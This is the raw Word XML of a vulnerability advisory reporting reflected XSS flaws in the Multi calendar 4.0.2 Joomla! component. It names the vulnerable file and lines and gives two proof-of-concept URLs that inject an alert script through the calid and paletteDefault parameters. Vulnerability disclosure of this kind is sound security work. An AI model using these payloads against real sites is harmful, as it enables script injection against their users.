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0D7" w:rsidRDefault="000912DF" w:rsidP="00D37240">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple cross-site scripting (XSS) vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidRPr="000912DF">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>Multi calendar 4.</w:t>
      </w:r>
      <w:r w:rsidR="00E072D7">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="000912DF">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA1DEA">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>for Joomla</w:t>
      </w:r>
      <w:r w:rsidR="00CA1DEA">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow remote attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD297E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">to inject arbitrary web script or HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>code via (1) the calid parameter to index.php or (2</w:t>
      </w:r>
      <w:r w:rsidRPr="009742E7">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">) the </w:t>
      </w:r>
      <w:r w:rsidR="009742E7" w:rsidRPr="009742E7">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">paletteDefault </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>parameter to index.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B460D7" w:rsidRDefault="00B460D7" w:rsidP="00B460D7">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="st"/>
        </w:rPr>
        <w:t>Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000912DF" w:rsidRDefault="000912DF" w:rsidP="00B0145F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="MediumShading1-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B072A" w:rsidTr="00541ED3">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRPr="000912DF" w:rsidRDefault="00470F99" w:rsidP="00E072D7">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
            <w:r w:rsidR="001B072A" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="000912DF" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Multi calendar 4.</w:t>
            </w:r>
            <w:r w:rsidR="00E072D7">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="000912DF" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>.2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRPr="009742E7" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009742E7">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Home Page Address:</w:t>
            </w:r>
            <w:r w:rsidR="009742E7" w:rsidRPr="009742E7">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> http://www.joomlacalendars.com/.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B072A" w:rsidTr="00541ED3">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="00541ED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1B072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="001B072A">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="003202BF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="003202BF" w:rsidRPr="003202BF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>tmpl</w:t>
            </w:r>
            <w:r w:rsidR="003202BF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000912DF" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>layout_editevent.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Lines: 161 and 481</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="00541ED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1B072A" w:rsidRDefault="000912DF" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5943600" cy="552450"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="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12DF" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000912DF" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5936615" cy="422910"/>
                  <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
                  <wp:docPr id="2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422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072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="00541ED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1B072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000912DF" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>index.php?option=com_multicalendar&amp;task=editevent&amp;calid=1";&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:bookmarkEnd w:id="1"/>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="001B072A">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B072A" w:rsidTr="00541ED3">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="00541ED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1B072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00F52119">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00F52119" w:rsidRPr="003202BF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>tmpl</w:t>
            </w:r>
            <w:r w:rsidR="00F52119">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000912DF" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>layout_editevent.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Line: </w:t>
            </w:r>
            <w:r w:rsidR="000912DF" w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>319</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000912DF" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5943600" cy="149860"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="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149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072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="00541ED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1B072A" w:rsidRPr="000912DF" w:rsidRDefault="001B072A" w:rsidP="00541ED3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000912DF" w:rsidRPr="000912DF" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000912DF">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/index.php?option=com_multicalendar&amp;task=editevent&amp;paletteDefault=1"&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000912DF" w:rsidRPr="00DA27EC" w:rsidRDefault="000912DF" w:rsidP="000912DF">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="001B072A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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001B072A" w:rsidRDefault="001B072A" w:rsidP="001B072A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001B072A" w:rsidSect="004877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709" w:rsidRDefault="00B25709" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00B25709" w:rsidRDefault="00B25709" w:rsidP="00D34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709" w:rsidRDefault="00B25709" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00B25709" w:rsidRDefault="00B25709" w:rsidP="00D347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155F"/>
    <w:rsid w:val="00053DEB"/>
    <w:rsid w:val="000912DF"/>
    <w:rsid w:val="000F5CED"/>
    <w:rsid w:val="001111D8"/>
    <w:rsid w:val="00143E24"/>
    <w:rsid w:val="00155C91"/>
    <w:rsid w:val="0018182E"/>
    <w:rsid w:val="001A42E0"/>
    <w:rsid w:val="001B072A"/>
    <w:rsid w:val="001B687F"/>
    <w:rsid w:val="001E2F80"/>
    <w:rsid w:val="00225A6D"/>
    <w:rsid w:val="0023324C"/>
    <w:rsid w:val="00233477"/>
    <w:rsid w:val="0024106A"/>
    <w:rsid w:val="002B06B9"/>
    <w:rsid w:val="002F42EC"/>
    <w:rsid w:val="002F68DA"/>
    <w:rsid w:val="003013DC"/>
    <w:rsid w:val="003202BF"/>
    <w:rsid w:val="0038393D"/>
    <w:rsid w:val="00386272"/>
    <w:rsid w:val="003912C4"/>
    <w:rsid w:val="003D0695"/>
    <w:rsid w:val="003F1B9E"/>
    <w:rsid w:val="004026DF"/>
    <w:rsid w:val="00412BBD"/>
    <w:rsid w:val="004347C9"/>
    <w:rsid w:val="00442405"/>
    <w:rsid w:val="00470F99"/>
    <w:rsid w:val="00487705"/>
    <w:rsid w:val="004878A3"/>
    <w:rsid w:val="00491EFF"/>
    <w:rsid w:val="00493D12"/>
    <w:rsid w:val="004B6747"/>
    <w:rsid w:val="004D19C6"/>
    <w:rsid w:val="004F3B67"/>
    <w:rsid w:val="00510BA0"/>
    <w:rsid w:val="00541ED3"/>
    <w:rsid w:val="0055155F"/>
    <w:rsid w:val="0059775D"/>
    <w:rsid w:val="005C4954"/>
    <w:rsid w:val="00621DD2"/>
    <w:rsid w:val="00681551"/>
    <w:rsid w:val="006A67A8"/>
    <w:rsid w:val="006C19A6"/>
    <w:rsid w:val="006F4700"/>
    <w:rsid w:val="00742A31"/>
    <w:rsid w:val="00782C3A"/>
    <w:rsid w:val="007942DB"/>
    <w:rsid w:val="007A1A41"/>
    <w:rsid w:val="007D36E6"/>
    <w:rsid w:val="008A1347"/>
    <w:rsid w:val="008E58DE"/>
    <w:rsid w:val="009578E3"/>
    <w:rsid w:val="009742E7"/>
    <w:rsid w:val="0098226D"/>
    <w:rsid w:val="00995C81"/>
    <w:rsid w:val="009E5DC8"/>
    <w:rsid w:val="00A06F86"/>
    <w:rsid w:val="00A32C2A"/>
    <w:rsid w:val="00A6697F"/>
    <w:rsid w:val="00AE7A3A"/>
    <w:rsid w:val="00AF4A04"/>
    <w:rsid w:val="00B0145F"/>
    <w:rsid w:val="00B25709"/>
    <w:rsid w:val="00B460D7"/>
    <w:rsid w:val="00B51EC6"/>
    <w:rsid w:val="00B558EF"/>
    <w:rsid w:val="00B56508"/>
    <w:rsid w:val="00B90310"/>
    <w:rsid w:val="00B93FB3"/>
    <w:rsid w:val="00BB22DB"/>
    <w:rsid w:val="00BB6AB2"/>
    <w:rsid w:val="00C31ACB"/>
    <w:rsid w:val="00CA1DEA"/>
    <w:rsid w:val="00D030DF"/>
    <w:rsid w:val="00D34775"/>
    <w:rsid w:val="00D37240"/>
    <w:rsid w:val="00DC4A71"/>
    <w:rsid w:val="00DF17DB"/>
    <w:rsid w:val="00E00774"/>
    <w:rsid w:val="00E072D7"/>
    <w:rsid w:val="00E15CF7"/>
    <w:rsid w:val="00E20410"/>
    <w:rsid w:val="00E25B93"/>
    <w:rsid w:val="00E445F0"/>
    <w:rsid w:val="00E54B77"/>
    <w:rsid w:val="00E62D34"/>
    <w:rsid w:val="00E847D6"/>
    <w:rsid w:val="00ED5826"/>
    <w:rsid w:val="00F34D5B"/>
    <w:rsid w:val="00F471C2"/>
    <w:rsid w:val="00F52119"/>
    <w:rsid w:val="00F739AF"/>
    <w:rsid w:val="00F80E0A"/>
    <w:rsid w:val="00FC2EE2"/>
    <w:rsid w:val="00FC2FF2"/>
    <w:rsid w:val="00FC4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BBD"/>
    <w:pPr>
      <w:bidi/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin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-Accent3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="004D19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D1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9C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="filename">
    <w:name w:val="filename"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-comment">
    <w:name w:val="phps-t-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable-marked">
    <w:name w:val="phps-t-variable-marked"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable">
    <w:name w:val="phps-t-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-code">
    <w:name w:val="phps-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-constant-encapsed-string">
    <w:name w:val="phps-t-constant-encapsed-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D34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4775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24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D34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775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="fa-IR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91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912C4"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="fa-IR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00681551"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0023324C"/>
  </w:style>
  <w:style w:type="table" w:styleId="MediumShading1-Accent1">
    <w:name w:val="Medium Shading 1 Accent 1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="63"/>
    <w:rsid w:val="001B07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mdgh</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-04T18:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-15T14:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>